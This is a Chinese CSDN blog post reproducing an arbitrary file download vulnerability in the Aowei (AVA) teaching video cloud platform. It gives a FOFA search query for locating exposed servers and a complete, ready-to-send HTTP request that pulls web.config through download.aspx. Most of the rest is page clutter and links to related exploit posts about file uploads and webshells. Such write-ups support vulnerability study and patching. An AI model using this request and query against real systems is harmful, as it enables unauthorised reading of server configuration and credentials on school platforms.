【漏洞复现】奥威亚视屏云平台任意文件下载漏洞

最新推荐文章于 2024-01-24 20:31:51 发布
最新推荐文章于 2024-01-24 20:31:51 发布
阅读量531 收藏 8
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45530380/article/details/135244576
版权

漏洞描述

广州市奥威亚电子科技有限公司校园视频应用云平台存在任意文件下载漏洞,攻击者可利用该漏洞下载服务器上任意文件,获取敏感信息

资产测绘

FOFA:app="AVA-教学视频应用云平台"

漏洞复现


GET /download.aspx?file=/web.config HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: ASP.NET_SessionId=15z0s55cmvsttopkzdyt1ud3
Upgrade-Insecure-Requests: 1

新疆东坡肉
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
奥威亚视频云平台VideoCover.aspx 接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-12 256
为了满足高校培养人才和教学管理的需求,顺应时代的发展,奥威亚围绕大数据下的学习和教育,推出升级版的高校视频应用云平台奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞
漏洞复现奥威亚视屏云平台-VideoCover-任意文件上传
知黑而守白
12-14 196
奥威亚教学视频应用服务平台是广州市奥威亚电子科技有限公司专门为满足当今教育领域的视频资源建设需求和用户的实际需求,开发的一款具有实用性、多功能性和特色鲜明的平台。该平台能够适应时代发展的需要,满足学校的各类教学需求。此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们!该产品存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器。
奥威亚教学视频应用云平台 VideoCover任意文件上传漏洞复现
0xSec
12-10 1080
奥威亚教学视频应用云平台 VideoCover.aspx接口处存在任意文件上传漏洞,未经身份验证的攻击者可利用上传后门文件达到获取服务器权限效果。
漏洞复现-某教育视频云平台前台某接口文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 596
复现某教育视频云平台前台某接口文件上传漏洞,附带自己写的poc脚本
复现奥威亚视屏云平台文件读取漏洞_27
最新发布
fushuang333的博客
01-24 594
复现奥威亚视屏云平台文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
奥威亚视屏云平台VideoCover任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-14 405
采用混合云架构,构建支撑新型教研、教学活动的互动云。它能有效确保互动便捷性、流畅性与安全性。根据教研、教学的需求,它支持互动点数的灵活扩展,实现大规模同步互动的负载均衡,保障区域大规模互动的并发应用。专为教学定制的互动云系统,更适用于专递课堂、联盟学校及网络教研等大规模互动教学需求。
奥威亚-分布式班班录播解决方案(电子云镜).docx
09-29
"奥威亚"作为领先的教育信息化解决方案提供商,针对当前教学视频资源不足的问题,提出了分布式班班录播解决方案,旨在打造符合国家标准的录播教室,推动“人人皆学、处处能学、时时可学”的教育目标。 一、项目背景...
奥威亚AVA录播招标参数课件资料.doc
04-10
奥威亚AVA录播招标参数课件资料 以下是根据给定的文件信息,生成的相关知识点: 1. 录播主机技术指标: * 纯嵌入一体式内置存储架构 * 支持不少于 4 个 3G-SDI、2 个 HDMI、1 个 VGA、2 个 YPbPr、2 个 S-video...
广州奥威亚播放软件
10-27
广州奥威亚播放软件能播放摄像头拍摄的视频,360度全方位播放
奥威亚AVA高清录播方案书 2.pdf
11-13
"奥威亚AVA高清录播方案书 ...7. 方案介绍:该方案旨在解决学校教学中存在的问题,提供了一种基于云架构设计的视频服务聚合技术,实现了资源均衡共享,并提供了多种功能,包括录播教室、观摩室和教学视频应用云平台等。
奥威亚AVA录播招标参数.pdf
10-18
奥威亚AVA录播招标参数.pdf 文件提供了详细的技术要求和参数规范,对于奥威亚AVA录播设备的供应商和生产商具有重要的参考价值。以下是从文件中提取的关键知识点: 谈判供应商须提供的证明材料 * 导播软件PAD 版...
奥威亚 AVA 高清录播方案书.docx
07-11
- 系统概述:奥威亚提供的方案包括常态录播教室、视频应用云平台和观摩室。常态录播教室能够自动捕捉课堂实况,观摩室则集成了管理和导播功能。云平台则为全校师生提供直播、点播和微课服务。 2. 预期效果: - ...
奥威亚AVA高清录播方案书.pdf
07-09
此外,奥威亚还提供了教学视频应用云平台,支持Windows、Android、iOS三大平台和多种终端设备,实现跨平台资源的共享。 奥威亚的方案具备多项技术优势。云聚合应用技术将分散的录播系统整合到一个云平台上,简化了...
奥威亚(AVA)高清录播办法方案.pdf
07-11
2. **视频应用云平台**:奥威亚搭建的云平台支持公开课直播、视频点播和微课学习,覆盖Windows、Android、iOS三大平台和PC、手机、平板三大终端,实现了跨平台资源共享。云聚合应用技术将分散的录播系统集成,统一由...
奥威亚(AVA)高清录播方案书.pdf
07-09
方案的核心是常态录播系统,它基于标准教室建设,利用互联网技术,实现课堂实况的自动拍摄和录制,同时通过云平台提供公开课直播、点播和微课学习服务。 1. **需求分析**: - 学校希望通过信息技术与课程整合,...
奥威亚ava)高清录播方案书.docx
07-09
- 视频应用云平台提供公开课直播、点播和微课服务,覆盖Windows、Android、iOS三大平台和PC、手机、平板三大终端。 - 观摩室集成了平台管理和实时导播,作为系统的核心管理中心。 3. **预期效果** - 实现全平台...
奥威亚全高清录播应用方案.pdf
07-09
奥威亚全高清录播应用方案】 该方案主要针对教育领域的网络教学实时录播系统建设,旨在优化教学资源,提升教学质量,同时满足其他多种功能需求。通过建设高清录播精品课室,学校可以实现教学内容的录制、传播以及...
奥威亚全高清录播应用方案.docx
07-09
该文档是关于奥威亚全高清录播应用方案的详细设计,主要目标是构建一个能够整合教育资源,提升教学质量的网络教学实时录播系统。这个系统不仅适用于学校,也适应于其他社会机构,具备多种功能,如视频互动、大型会议...
奥威亚高清录播方案:云平台+智能技术打造高效教学资源
奥威亚(AVA)高清录播方案书旨在构建一个基于互联网的云平台,以满足老河口市新一中对公开课直播、视频点播和微课学习的需求。该方案主要特点和设计如下: 1. **方案概述**: - 云平台设计:通过云聚合应用技术,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值